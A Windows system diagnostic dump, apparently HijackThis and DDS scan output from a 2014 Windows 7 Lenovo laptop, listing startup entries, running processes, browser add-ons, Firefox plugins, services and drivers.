O4 - HKLM\..\Run: [HP Software Update] C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe
O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
O4 - HKLM\..\Run: [Search Protection] C:\ProgramData\Search Protection\SearchProtection.exe
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
O4 - HKCU\..\Run: [AmazonMP3DownloaderHelper] C:\Users\tk\AppData\Local\Program Files\Amazon\MP3 Downloader\AmazonMP3DownloaderHelper.exe
O4 - HKCU\..\Run: [StrongVPN Client] "C:\Program Files (x86)\StrongVPN\StrongDial.exe" --silent
O4 - HKUS\S-1-5-18\..\RunOnce: [SPReview] "C:\windows\System32\SPReview\SPReview.exe" /sp:1 /errorfwlink:"http://go.microsoft.com/fwlink/?LinkID=122915" /build:7601 (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\RunOnce: [SPReview] "C:\windows\System32\SPReview\SPReview.exe" /sp:1 /errorfwlink:"http://go.microsoft.com/fwlink/?LinkID=122915" /build:7601 (User 'Default user')
O4 - Startup: Dropbox.lnk = tk\AppData\Roaming\Dropbox\bin\Dropbox.exe
O4 - Global Startup: CrashPlan Tray.lnk = C:\Program Files (x86)\CrashPlan\CrashPlanTray.exe
O8 - Extra context menu item: Add to Anti-Banner - C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\ie_banner_deny.htm
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~2\MICROS~1\Office14\EXCEL.EXE/3000
O8 - Extra context menu item: Send image to &Bluetooth Device... - C:\Program Files\Lenovo\Bluetooth Software\btsendto_ie_ctx.htm
O8 - Extra context menu item: Send page to &Bluetooth Device... - C:\Program Files\Lenovo\Bluetooth Software\btsendto_ie.htm
O9 - Extra button: Virtual Keyboard - {0C4CC089-D306-440D-9772-464E226F6539} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\IEExt\VirtualKeyboard\ie_virtual_keyboard_plugin.dll
O9 - Extra button: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1004 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra 'Tools' menuitem: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1003 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra button: Send To Bluetooth - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Program Files\Lenovo\Bluetooth Software\btsendto_ie.htm
O9 - Extra 'Tools' menuitem: Send to &Bluetooth Device... - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Program Files\Lenovo\Bluetooth Software\btsendto_ie.htm
O9 - Extra button: URLs check - {CCF151D8-D089-449F-A5A4-D9909053F20F} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\IEExt\UrlAdvisor\klwtbbho.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~2\COMMON~1\Skype\SKYPE4~1.DLL
O18 - Protocol: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
O18 - Filter hijack: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\windows\System32\alg.exe (file missing)
O23 - Service: AMD External Events Utility - Unknown owner - C:\windows\system32\atiesrxx.exe (file missing)
O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
O23 - Service: Kaspersky Anti-Virus Service (AVP) - Kaspersky Lab ZAO - C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\avp.exe
O23 - Service: Bluetooth Driver Management Service (BcmBtRSupport) - Unknown owner - C:\windows\system32\BtwRSupportService.exe (file missing)
O23 - Service: Bonjour Service - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: Bluetooth Service (btwdins) - Broadcom Corporation. - C:\Program Files\Lenovo\Bluetooth Software\btwdins.exe
O23 - Service: CrashPlan Backup Service (CrashPlanService) - CrashPlan - C:\Program Files (x86)\CrashPlan\CrashPlanService.exe
O23 - Service: CryptoStorage control service (CSObjectsSrv) - Infowatch - C:\Program Files (x86)\Common Files\InfoWatch\CryptoStorage\ProtectedObjectsSrv.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\windows\System32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\windows\system32\fxssvc.exe (file missing)
O23 - Service: Google Update Service (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google Update Service (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: @%SystemRoot%\system32\ieetwcollectorres.dll,-1000 (IEEtwCollectorService) - Unknown owner - C:\windows\system32\IEEtwCollector.exe (file missing)
O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\windows\system32\lsass.exe (file missing)
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\windows\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\windows\system32\lsass.exe (file missing)
O23 - Service: Oasis2Service - Unknown owner - C:\Program Files (x86)\DDNi\Oasis2Service 1.0\Oasis2Service.exe
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\windows\system32\lsass.exe (file missing)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: Slidebar Notifier Service - Lenovo - C:\Program Files\Lenovo\Lenovo SlideNav\SlidebarNavigator\SlidebarNotifier.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\windows\system32\sppsvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\windows\system32\UI0Detect.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\windows\system32\vssvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\Wat\WatUX.exe,-601 (WatAdminSvc) - Unknown owner - C:\windows\system32\Wat\WatAdminSvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\windows\system32\wbengine.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

--
End of file - 12974 bytes



DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 11.0.9600.17126 BrowserJavaVersion: 10.60.2
Run by tk at 20:01:10 on 2014-06-24
Microsoft Windows 7 Home Premium 6.1.7601.1.1252.1.1033.18.8173.4888 [GMT -7:00]
.
AV: Kaspersky PURE 3.0 *Enabled/Updated* {C3113FBF-4BCB-4461-D78D-6EDFEC9593E5}
SP: Kaspersky PURE 3.0 *Enabled/Updated* {7870DE5B-6DF1-4BEF-ED3D-55AD9712D958}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: Kaspersky PURE 3.0 *Enabled* {FB2ABE9A-01A4-4539-FCD2-C7EA1246D49E}
.
============== Running Processes ===============
.
C:\windows\system32\lsm.exe
C:\windows\system32\svchost.exe -k DcomLaunch
C:\windows\system32\svchost.exe -k RPCSS
C:\windows\system32\atiesrxx.exe
C:\windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\windows\system32\svchost.exe -k LocalService
C:\windows\system32\svchost.exe -k netsvcs
C:\windows\system32\svchost.exe -k GPSvcGroup
C:\windows\system32\svchost.exe -k NetworkService
C:\windows\system32\atieclxx.exe
C:\windows\System32\spoolsv.exe
C:\windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\avp.exe
C:\windows\system32\BtwRSupportService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\Lenovo\Bluetooth Software\btwdins.exe
C:\Program Files (x86)\CrashPlan\CrashPlanService.exe
C:\Program Files (x86)\Common Files\InfoWatch\CryptoStorage\ProtectedObjectsSrv.exe
C:\Program Files (x86)\DDNi\Oasis2Service 1.0\Oasis2Service.exe
C:\windows\system32\Dwm.exe
C:\windows\system32\taskhost.exe
C:\windows\Explorer.EXE
C:\Program Files\Lenovo\Lenovo SlideNav\SlidebarNavigator\SlidebarNotifier.exe
C:\windows\system32\svchost.exe -k imgsvc
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
C:\windows\system32\svchost.exe -k bthsvcs
C:\windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\Program Files\Synaptics\SynTP\SynBtnAsst.exe
C:\Program Files (x86)\Lenovo\Onekey Theater\OnekeyStudio.exe
C:\Program Files (x86)\Lenovo\Energy Management\utility.exe
C:\Program Files (x86)\Lenovo\Energy Management\Energy Management.exe
C:\Users\tk\AppData\Local\Program Files\Amazon\MP3 Downloader\AmazonMP3DownloaderHelper.exe
C:\Program Files (x86)\Lenovo\Onekey Theater\OnekeySupport.exe
C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
C:\Program Files\Windows Media Player\wmpnetwk.exe
C:\windows\system32\taskeng.exe
C:\Program Files (x86)\Lenovo\YouCam\YCMMirage.exe
C:\Program Files (x86)\CrashPlan\CrashPlanTray.exe
C:\Users\tk\AppData\Roaming\Dropbox\bin\Dropbox.exe
C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
C:\Program Files (x86)\Lenovo\Lenovo MuteSync\MuteSync.exe
C:\Program Files\Lenovo\Lenovo SlideNav\SlidebarNavigator\SlideNavVDM.exe
C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\avp.exe
C:\Program Files\Lenovo\Lenovo SlideNav\SlidebarNavigator\SlidebarNavigator.exe
C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
C:\windows\system32\SearchIndexer.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\windows\System32\svchost.exe -k secsvcs
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
C:\windows\System32\svchost.exe -k LocalServicePeerNet
C:\Program Files (x86)\BodyMedia\Sync\BodyMediaSync.exe
C:\Program Files (x86)\Mozilla Firefox\firefox.exe
C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe
C:\windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_13_0_0_214.exe
C:\windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_13_0_0_214.exe
C:\windows\system32\SearchProtocolHost.exe
C:\windows\system32\wbem\wmiprvse.exe
C:\windows\system32\taskhost.exe
C:\windows\system32\NOTEPAD.EXE
C:\windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://www.google.com/
mWinlogon: Userinit = userinit.exe
BHO: Content Blocker Plugin: {5564CC73-EFA7-4CBF-918A-5CF7FBBFFF4F} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\IEExt\ContentBlocker\ie_content_blocker_plugin.dll
BHO: Groove GFS Browser Helper: {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL
BHO: Virtual Keyboard Plugin: {73455575-E40C-433C-9784-C78DC7761455} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\IEExt\VirtualKeyboard\ie_virtual_keyboard_plugin.dll
BHO: Java(tm) Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll
BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
BHO: Safe Money Plugin: {9E6D0D23-3D72-4A94-AE1F-2D167624E3D9} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\IEExt\OnlineBanking\online_banking_bho.dll
BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL
BHO: Java(tm) Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll
BHO: URL Advisor Plugin: {E33CF602-D945-461A-83F0-819F76A199F8} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\IEExt\UrlAdvisor\klwtbbho.dll
uRun: [AmazonMP3DownloaderHelper] C:\Users\tk\AppData\Local\Program Files\Amazon\MP3 Downloader\AmazonMP3DownloaderHelper.exe
uRun: [StrongVPN Client] "C:\Program Files (x86)\StrongVPN\StrongDial.exe" --silent
mRun: [StartCCC] "C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" MSRun
mRun: [MuteSync] C:\PROGRA~2\Lenovo\LENOVO~1\MuteSync.exe
mRun: [VeriFaceManager] C:\Program Files (x86)\Lenovo\VeriFace\PManage.exe
mRun: [Lenovo SlideNav2] "C:\Program Files\Lenovo\Lenovo SlideNav\SlidebarNavigator\SlideNavVDM.exe"
mRun: [AVP] "C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\avp.exe"
mRun: [BCSSync] "C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe" /DelayServices
mRun: [YouCam Mirage] "C:\Program Files (x86)\Lenovo\YouCam\YCMMirage.exe"
mRun: [YouCam Tray] "C:\Program Files (x86)\Lenovo\YouCam\YouCam.exe" /s
mRun: [APSDaemon] "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
mRun: [HP Software Update] C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe
mRun: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
mRun: [Search Protection] C:\ProgramData\Search Protection\SearchProtection.exe
mRun: [QuickTime Task] "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
mRun: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
mRun: [iTunesHelper] "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
dRunOnce: [SPReview] "C:\windows\System32\SPReview\SPReview.exe" /sp:1 /errorfwlink:"http://go.microsoft.com/fwlink/?LinkID=122915" /build:7601
StartupFolder: C:\Users\tk\AppData\Roaming\MICROS~1\Windows\STARTM~1\Programs\Startup\Drop box.lnk - C:\Users\tk\AppData\Roaming\Dropbox\bin\Dropbox.exe
StartupFolder: C:\PROGRA~3\MICROS~1\Windows\STARTM~1\Programs\Startup\CRASHP~1.LNK - C:\Program Files (x86)\CrashPlan\CrashPlanTray.exe
uPolicies-Explorer: NoDriveTypeAutoRun = dword:145
mPolicies-Explorer: NoActiveDesktop = dword:1
mPolicies-Explorer: NoActiveDesktopChanges = dword:1
mPolicies-System: ConsentPromptBehaviorAdmin = dword:5
mPolicies-System: ConsentPromptBehaviorUser = dword:3
mPolicies-System: EnableUIADesktopToggle = dword:0
IE: Add to Anti-Banner - C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\ie_banner_deny.htm
IE: E&xport to Microsoft Excel - C:\PROGRA~2\MICROS~1\Office14\EXCEL.EXE/3000
IE: Send image to &Bluetooth Device... - C:\Program Files\Lenovo\Bluetooth Software\btsendto_ie_ctx.htm
IE: Send page to &Bluetooth Device... - C:\Program Files\Lenovo\Bluetooth Software\btsendto_ie.htm
IE: {0C4CC089-D306-440D-9772-464E226F6539} - {0BA14598-4178-4CE5-B1F1-B5C6408A3F2E} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\IEExt\VirtualKeyboard\ie_virtual_keyboard_plugin.dll
IE: {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - {5F7B1267-94A9-47F5-98DB-E99415F33AEC} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
IE: {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Program Files\Lenovo\Bluetooth Software\btsendto_ie.htm
IE: {CCF151D8-D089-449F-A5A4-D9909053F20F} - {CCF151D8-D089-449F-A5A4-D9909053F20F} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\IEExt\UrlAdvisor\klwtbbho.dll
TCP: NameServer = 68.105.28.11 68.105.29.11 68.105.28.12
TCP: Interfaces\{67059FF0-CB67-4A42-862C-5A9559E73FD2} : DHCPNameServer = 8.8.8.8 8.8.4.4 172.16.2.5
TCP: Interfaces\{8F5762E6-E089-419F-AFE3-DE09DC69060D} : DHCPNameServer = 68.105.28.11 68.105.29.11 68.105.28.12
TCP: Interfaces\{8F5762E6-E089-419F-AFE3-DE09DC69060D}\47B666F65727 : DHCPNameServer = 68.105.28.11 68.105.29.11 68.105.28.12
TCP: Interfaces\{8F5762E6-E089-419F-AFE3-DE09DC69060D}\84643535D275966496 : DHCPNameServer = 8.8.8.8 8.8.4.4
TCP: Interfaces\{8F5762E6-E089-419F-AFE3-DE09DC69060D}\C616B65667963647F627961623 : DHCPNameServer = 192.168.1.1
TCP: Interfaces\{8F5762E6-E089-419F-AFE3-DE09DC69060D}\D49784F64744F676 : DHCPNameServer = 210.154.134.150 180.131.208.53
Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll
Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
SSODL: WebCheck - <orphaned>
SEH: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\35.0.1916.153\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
x64-BHO: Content Blocker Plugin: {5564CC73-EFA7-4CBF-918A-5CF7FBBFFF4F} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\x64\IEExt\ContentBlocker\ie_content_blocker_plugin.dll
x64-BHO: Virtual Keyboard Plugin: {73455575-E40C-433C-9784-C78DC7761455} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\x64\IEExt\VirtualKeyboard\ie_virtual_keyboard_plugin.dll
x64-BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
x64-BHO: Safe Money Plugin: {9E6D0D23-3D72-4A94-AE1F-2D167624E3D9} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\x64\IEExt\OnlineBanking\online_banking_bho.dll
x64-BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL
x64-BHO: URL Advisor Plugin: {E33CF602-D945-461A-83F0-819F76A199F8} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\x64\IEExt\UrlAdvisor\klwtbbho.dll
x64-Run: [RtHDVCpl] C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s
x64-Run: [RtHDVBg] C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe /FORPCEE3
x64-Run: [SynTPEnh] C:\Program Files (x86)\Synaptics\SynTP\SynTPEnh.exe
x64-Run: [SynBtnAsst] C:\Program Files (x86)\Synaptics\SynTP\SynBtnAsst.exe Utility_Window
x64-Run: [OnekeyStudio] C:\Program Files (x86)\Lenovo\Onekey Theater\OnekeyStudio.exe
x64-Run: [EnergyUtility] C:\Program Files (x86)\Lenovo\Energy Management\utility.exe
x64-Run: [Energy Management] C:\Program Files (x86)\Lenovo\Energy Management\Energy Management.exe
x64-Run: [Logitech Download Assistant] C:\windows\System32\rundll32.exe C:\windows\System32\LogiLDA.dll,LogiFetch
x64-IE: {0C4CC089-D306-440D-9772-464E226F6539} - {0BA14598-4178-4CE5-B1F1-B5C6408A3F2E} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\x64\IEExt\VirtualKeyboard\ie_virtual_keyboard_plugin.dll
x64-IE: {A95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\Program Files (x86)\Evernote\Evernote\EvernoteIERes\AddNote.html
x64-IE: {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Program Files\Lenovo\Bluetooth Software\btsendto_ie.htm
x64-IE: {CCF151D8-D089-449F-A5A4-D9909053F20F} - {CCF151D8-D089-449F-A5A4-D9909053F20F} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\x64\IEExt\UrlAdvisor\klwtbbho.dll
x64-Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
x64-Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - <orphaned>
x64-Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - <orphaned>
x64-SSODL: WebCheck - <orphaned>
.
================= FIREFOX ===================
.
FF - ProfilePath - C:\Users\tk\AppData\Roaming\Mozilla\Firefox\Profiles\e72isk5b.default\
FF - prefs.js: browser.search.selectedEngine - SecureSearch
FF - prefs.js: browser.startup.homepage - about:home
FF - component: C:\Program Files (x86)\McAfee\SiteAdvisor\components\McFFPlg.dll
FF - plugin: C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL
FF - plugin: C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL
FF - plugin: C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll
FF - plugin: C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll
FF - plugin: C:\Program Files (x86)\Java\jre7\bin\dtplugin\npdeployJava1.dll
FF - plugin: C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll
FF - plugin: c:\Program Files (x86)\Microsoft Silverlight\5.1.30214.0\npctrlui.dll
FF - plugin: C:\Program Files (x86)\Mozilla Firefox\browser\plugins\npMozCouponPrinter.dll
FF - plugin: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll
FF - plugin: C:\Users\tk\AppData\Local\Fuze Box\Fuze Meeting\npfuzeshare.dll
FF - plugin: C:\Users\tk\AppData\Local\Program Files\Amazon\MP3 Downloader\npAmazonMP3DownloaderPlugin10181.dll
FF - plugin: C:\windows\SysWOW64\Macromed\Flash\NPSWF32_13_0_0_214.dll
.
---- FIREFOX POLICIES ----
FF - user.js: general.useragent.extra.brc -
.
============= SERVICES / DRIVERS ===============
.
R0 CSCrySec;InfoWatch Encrypt Sector Library driver;C:\windows\System32\drivers\CSCrySec.sys [2013-7-14 84536]
R0 LHDmgr;LHDmgr;C:\windows\System32\drivers\LhdX64.sys [2011-5-4 39008]
R1 BdfNdisf;BitDefender Firewall NDIS 6 Filter Driver;C:\Program Files\Lavasoft\Ad-Aware Antivirus\Firewall Engine\1.6.0.0\Drivers\bdfndisf6.sys [2013-10-21 93160]
R1 bdfwfpf;bdfwfpf;C:\Program Files\Lavasoft\Ad-Aware Antivirus\Firewall Engine\1.6.0.0\Drivers\bdfwfpf.sys [2013-10-21 102992]
R1 CSVirtualDiskDrv;InfoWatch Virtual Disk driver;C:\windows\System32\drivers\CSVirtualDiskDrv.sys [2013-7-14 66616]
R1 KLIM6;Kaspersky Anti-Virus NDIS 6 Filter;C:\windows\System32\drivers\klim6.sys [2012-8-2 29792]
R1 kltdi;kltdi;C:\windows\System32\drivers\kltdi.sys [2012-10-18 54368]
R1 kneps;kneps;C:\windows\System32\drivers\kneps.sys [2012-8-13 178448]
R2 AMD External Events Utility;AMD External Events Utility;C:\windows\System32\atiesrxx.exe [2010-12-1 203264]
R2 AVP;Kaspersky Anti-Virus Service;C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\avp.exe [2012-12-20 356128]
R2 BcmBtRSupport;Bluetooth Driver Management Service;C:\windows\System32\BtwRSupportService.exe [2013-10-28 2255064]
R2 CrashPlanService;CrashPlan Backup Service;C:\Program Files (x86)\CrashPlan\CrashPlanService.exe [2013-4-8 152576]
R2 CSObjectsSrv;CryptoStorage control service;C:\Program Files (x86)\Common Files\InfoWatch\CryptoStorage\ProtectedObjectsSrv.exe [2012-12-21 819040]
R2 Oasis2Service;Oasis2Service;C:\Program Files (x86)\DDNi\Oasis2Service 1.0\Oasis2Service.exe [2010-12-22 46080]
R2 Slidebar Notifier Service;Slidebar Notifier Service;C:\Program Files\Lenovo\Lenovo SlideNav\SlidebarNavigator\SlidebarNotifier.exe [2011-5-4 69568]
R3 ACPIVPC;Lenovo Virtual Power Controller Driver;C:\windows\System32\drivers\AcpiVpc.sys [2011-5-4 28176]
R3 bcbtums;Bluetooth USB LD Filter;C:\windows\System32\drivers\bcbtums.sys [2013-10-28 170712]
R3 btwampfl;btwampfl;C:\windows\System32\drivers\btwampfl.sys [2013-10-28 166104]
R3 btwl2cap;Bluetooth L2CAP Service;C:\windows\System32\drivers\btwl2cap.sys [2011-5-4 35104]
R3 clwvd;CyberLink WebCam Virtual Driver;C:\windows\System32\drivers\clwvd.sys [2011-1-11 31088]
R3 JmUsbCcgp;JMicron USB Composite Device Lower Filter Driver;C:\windows\System32\drivers\jmccgp.sys [2011-5-4 17904]
R3 JmUsbVideo;JMicron 31x Upper Filter Driver;C:\windows\System32\drivers\jmcam.sys [2011-5-4 57072]
R3 JmUsbVideo2;JMicron 31x Lower Filter Driver;C:\windows\System32\drivers\jmcam_lo.sys [2011-5-4 31344]
